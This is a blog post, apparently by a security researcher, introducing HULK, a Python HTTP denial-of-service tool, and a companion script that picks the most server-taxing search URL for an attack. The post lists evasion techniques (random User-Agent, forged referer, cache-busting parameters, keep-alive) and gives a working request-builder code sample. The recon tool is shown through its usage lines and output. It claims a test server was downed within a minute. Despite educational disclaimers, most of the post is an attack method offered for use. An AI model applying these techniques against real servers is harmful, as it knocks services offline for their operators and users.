HULK, Web Server DoS Tool

Introducing HULK (HTTP Unbearable Load King).

In my line of work, I get to see tons of nifty hacking and traffic-generation tools, meant either to break into a system and steal information, or to exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, and their main problem is always the same… they create repeatable patterns, making it too easy to predict the next request that is coming, and therefore to mitigate it. Some, although elegant, lack the horsepower to really bring a system to its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Harnessing Python, I wrote a script that generates nicely crafted, unique HTTP requests one after the other, producing a fair load on a web server and eventually exhausting its resources. This can be optimized much, much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK is to make each and every request it generates unique, thus avoiding/bypassing caching engines and hitting the server's load directly.

I have published it to Packet Storm, as we do.

Some Techniques

  • Obfuscation of Source Client – done by keeping a list of known User-Agent strings; for every request that is constructed, the User-Agent header is a random value out of the known list
  • Reference Forgery – the referer that accompanies the request is obfuscated and points either to the host itself or to one of several major pre-listed websites.
  • Stickiness – using standard HTTP headers to ask the server to maintain open connections, via Keep-Alive with a variable time window
  • no-cache – this is a given, but by asking the HTTP server for no-cache, a server that is not behind a dedicated caching service will compute and present a unique page.
  • Unique Transformation of URL – to eliminate caching and other optimization tools, custom parameter names and values are randomized and attached to each request, rendering it unique and forcing the server to process the response on each event.
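Put together, the techniques above can be sketched as a small request builder. This is a minimal illustration, not HULK's actual code: the User-Agent and referer pools are placeholder samples (HULK ships much longer lists), and the helper names are mine.

```python
import random
import string

# Small placeholder pools -- the real tool carries much longer lists.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7) AppleWebKit/534.57",
]
REFERERS = ["http://www.google.com/?q=", "http://www.bing.com/search?q="]

def rand_token(n=8):
    """Random alphanumeric string used for parameter names and values."""
    return "".join(random.choice(string.ascii_letters + string.digits)
                   for _ in range(n))

def build_request(host, path="/"):
    """Return (url, headers) for one unique, cache-busting request."""
    # A random query string makes every request unique, defeating caches
    # and forcing the server to process each request itself.
    url = "http://%s%s?%s=%s" % (host, path, rand_token(), rand_token())
    headers = {
        "User-Agent": random.choice(USER_AGENTS),           # source obfuscation
        "Referer": random.choice(REFERERS) + rand_token(),  # reference forgery
        "Cache-Control": "no-cache",                        # bypass caching layers
        "Connection": "keep-alive",                         # stickiness
        "Keep-Alive": str(random.randint(100, 1200)),       # variable time window
    }
    return url, headers
```

Each call yields a request the server has never seen before, which is exactly what keeps caching engines out of the picture.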


Basically, my test web server with 4 GB of RAM running Microsoft IIS7 was brought to its knees in under a minute, with all requests running from a single host.

In the pictures below you can see the tool in action: first ( #1 ) it is executed against a URL and starts generating a load of unique requests, sending them to the target server ( the host of the URL ); second ( #2 ) we can see that at some point the server starts failing to respond, since it has exhausted its resource pool.


Note that the “safe” word is meant to kill the process after all threads get a 500 error, since that is easier to control in a lab; it is optional.


File : ( via Packetstorm )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.


[ Edit 25nov2012 : changed download link to packetstorm ]

Finding the best Web DoS Attack URL


To establish common ground, I would like to start by explaining some theory behind DoS attacks on the HTTP attack vector.

An HTTP DoS attack is usually not based on a vulnerability or known flaw in a web server or a service; instead, it is an attempt to bring a server down by using up all of its available resources and its service pool. That being said, common HTTP DoS tools usually operate by generating massive amounts of requests to a specific set of URLs on a website, in order to choke the resource pool and deny the service.

One very important element in the process is locating the “Perfect URL” – the URL that causes the most load on the server when requested, requiring the server to process as much data as possible before presenting the output to the client. Because of that, the best vector is usually the website's search engine, since a search will always require some computation power.


What I came to realize is that a simple engine can be written to run a dictionary against a search engine: by observing the number of results the website returns for each keyword, an automated tool can determine which search term creates the most load on the server, and build the DoS URL based on that.

Ready, Get Set, Go!

Let's break the idea into what we want to achieve. We want to run multiple requests to a web server's search URL, each using a dictionary word as the search term. Then, by parsing the response page for the place where the number of results is returned, we find the phrase that returns the most results (the max) and crown it the “Perfect URL” for a DoS attack.

Using Python, I wrote such a tool. It takes as input a search URL, a regex for finding the number of results, and a dictionary file, and does what I described above ( multithreaded, of course ).

Usage looks something like :

python 'results\s\:\s(\d+)' wordlist.txt

The tool then opens several threads, each taking a word out of the dictionary and appending it to the search string. Each thread then looks for the regular expression in the result page and grabs the number of results. Finally, the tool outputs the URL that has produced the highest number of results so far.
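The loop just described can be sketched roughly like this. This is my reconstruction, not the published source: `best_dos_url`, `probe`, and the pluggable `fetch` parameter are names I chose, and the count regex is whatever matches the target site's result page.

```python
import re
import threading
import urllib.request
from queue import Empty, Queue

def default_fetch(url):
    """Fetch a URL and return the page body as text."""
    return urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")

def probe(search_url, pattern, words, results, fetch):
    """Worker: request search_url + word, pull the result count via regex."""
    while True:
        try:
            word = words.get_nowait()
        except Empty:
            return  # dictionary exhausted
        try:
            page = fetch(search_url + word)
        except OSError:
            continue  # skip words whose pages fail to load
        m = pattern.search(page)
        if m:
            results.append((int(m.group(1)), search_url + word))

def best_dos_url(search_url, count_regex, wordlist, nthreads=8, fetch=default_fetch):
    """Run the dictionary through the search engine; return the (count, url) max."""
    pattern = re.compile(count_regex)
    words, results = Queue(), []  # list.append is atomic in CPython
    for w in wordlist:
        words.put(w)
    threads = [threading.Thread(target=probe,
                                args=(search_url, pattern, words, results, fetch))
               for _ in range(nthreads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return max(results) if results else None
```

The regex argument is the same kind of pattern as in the command-line example above, e.g. `'results\s\:\s(\d+)'`, with the capture group holding the result count.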

Looks something like this :

python 'results\s\:\s(\d+)' dictionary.txt
-- Loading Dictionary --
-- Loading Complete --
WORD:tree COUNT:13454 URL:
WORD:woman COUNT:110565 URL:
WORD:man COUNT:203721 URL:

As you can see, the word “man” produced the most search results ( 203721 ), and therefore the best URL to run an HTTP DoS attack against this site will be 

In a DoS attack scheme, this kind of tool will/should be used as part of the reconnaissance phase: detecting a good attack URL ( or URLs ), and then running a DoS tool against it.


I am sharing this as an educational tool, designed to be used only in a lab environment and not in the wild. It is meant for research purposes only, and any malicious usage of this tool is prohibited.

File : ( zip file )